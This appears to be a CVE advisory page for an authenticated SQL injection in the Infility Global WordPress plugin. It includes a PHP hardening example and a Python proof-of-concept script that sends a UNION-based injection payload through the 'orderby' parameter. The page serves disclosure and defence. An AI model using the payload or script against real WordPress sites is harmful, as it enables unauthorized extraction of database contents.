Security Vulnerability Report
CVE-2026-8685 CVSS 6.5 MEDIUM

CVE-2026-8685

Published: 2026-05-20 02:16:41
Last Modified: 2026-05-20 02:16:41

Description

The Infility Global plugin for WordPress is vulnerable to SQL Injection via the 'orderby' and 'order' parameters in all versions up to, and including, 2.15.16. This is due to insufficient escaping on user supplied parameters and lack of sufficient preparation on the existing SQL query within the show_control_data::post_list() function, which is registered as an admin menu page with only the 'read' capability. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
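The root cause described above is an ORDER BY clause assembled from unvalidated 'orderby' and 'order' request parameters on a page any Subscriber can reach. The following is an added example, not code from the Infility Global plugin, showing how a WordPress admin-page handler can constrain both parameters to an allowlist, keep the remaining value in $wpdb->prepare(), and register the page with a capability stricter than 'read'. The function names, table name and column names are assumptions; the %i identifier placeholder requires WordPress 6.2 or later.

```php
<?php
// Added illustrative example (not Infility Global's code). Assumed schema:
// table {$wpdb->prefix}control_data with columns id, title, created_at.

function cd_sanitize_order_params( array $request ): array {
    // Allowlist of sortable columns; anything else falls back to a safe default.
    $allowed_columns = array( 'id', 'title', 'created_at' );
    $orderby = isset( $request['orderby'] ) ? (string) $request['orderby'] : 'id';
    if ( ! in_array( $orderby, $allowed_columns, true ) ) {
        $orderby = 'id';
    }
    // Sort direction is a two-value enum; normalise case and reject anything else.
    $order = isset( $request['order'] ) ? strtoupper( (string) $request['order'] ) : 'ASC';
    if ( 'DESC' !== $order ) {
        $order = 'ASC';
    }
    return array( $orderby, $order );
}

function cd_post_list_hardened( wpdb $wpdb, array $request, int $per_page = 20 ): array {
    // Enforce the capability again inside the handler; 'read' is held by every
    // logged-in user, so a data listing should require an administrative capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    list( $orderby, $order ) = cd_sanitize_order_params( $request );
    $table = $wpdb->prefix . 'control_data';

    // The weak pattern interpolates $_GET['orderby'] and $_GET['order'] directly
    // into the SQL string. Here the column goes through the %i identifier
    // placeholder, the direction is a validated literal, and the limit is a %d.
    $sql = $wpdb->prepare(
        "SELECT id, title, created_at FROM %i ORDER BY %i {$order} LIMIT %d",
        $table,
        $orderby,
        $per_page
    );
    return (array) $wpdb->get_results( $sql, ARRAY_A );
}

add_action( 'admin_menu', function () {
    // Register the page for administrators only instead of the 'read' capability.
    add_menu_page(
        'Control Data', 'Control Data', 'manage_options', 'cd-control-data',
        function () {
            global $wpdb;
            $rows = cd_post_list_hardened( $wpdb, $_GET );
            echo '<pre>' . esc_html( wp_json_encode( $rows, JSON_PRETTY_PRINT ) ) . '</pre>';
        }
    );
} );
```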

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Weakness
CWE-89 (SQL Injection)

Configurations (Affected Products)

No CPE configuration data is available yet (the record's vulnStatus is "Received"); the affected range below is taken from the description.

Infility Global <= 2.15.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Proof of Concept for CVE-2026-8685
# Target: WordPress Infility Global Plugin <= 2.15.16
# Description: Authenticated SQL Injection via 'orderby' parameter

def exploit(url, cookies):
    # The vulnerable endpoint is the admin menu page registered by the plugin
    target_url = f"{url}/wp-admin/admin.php"

    # Malicious payload to extract database version using UNION based SQL injection
    # Example payload: ORDER BY 1 UNION SELECT 1,2,version(),4,5,6,7,8,9,10-- -
    # Adjust the number of columns based on the original query structure
    payload = {
        "page": "infility-global-show-control-data",
        "orderby": "1 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10-- -",
        "order": "asc"
    }

    try:
        response = requests.get(target_url, params=payload, cookies=cookies, timeout=10)
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Check the response body for potential database version leakage.")
            print(response.text[:500])  # Print snippet of response
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target URL and valid subscriber cookies
    target = "http://localhost"
    # Example cookie format for a logged-in subscriber
    subscriber_cookies = {
        "wordpress_logged_in_...": "valid_cookie_value_here"
    }
    exploit(target, subscriber_cookies)

References

https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L34
https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L74
https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L78
https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L84
https://www.wordfence.com/threat-intel/vulnerabilities/id/1caeb5e0-9e4e-4c9e-a6e4-881fb81dc5f2?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8685", "sourceIdentifier": "[email protected]", "published": "2026-05-20T02:16:41.143", "lastModified": "2026-05-20T02:16:41.143", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Infility Global plugin for WordPress is vulnerable to SQL Injection via the 'orderby' and 'order' parameters in all versions up to, and including, 2.15.16. This is due to insufficient escaping on user supplied parameters and lack of sufficient preparation on the existing SQL query within the show_control_data::post_list() function, which is registered as an admin menu page with only the 'read' capability. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L34", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L74", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L78", "source": "[email protected]"}, {"url": 
"https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L84", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1caeb5e0-9e4e-4c9e-a6e4-881fb81dc5f2?source=cve", "source": "[email protected]"}]}}